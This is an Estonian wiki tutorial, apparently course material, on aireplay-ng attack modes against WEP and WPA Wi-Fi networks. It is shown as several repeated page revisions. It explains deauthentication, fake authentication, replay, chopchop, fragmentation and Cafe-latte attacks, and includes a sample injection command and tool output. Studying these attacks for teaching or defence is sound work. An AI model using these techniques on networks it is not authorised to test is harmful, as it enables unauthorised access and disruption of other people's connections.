Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:27:03Z

Tliiv: /* Teooria */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:23:17Z

Tliiv: /* Rünnak 1: Fake authentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

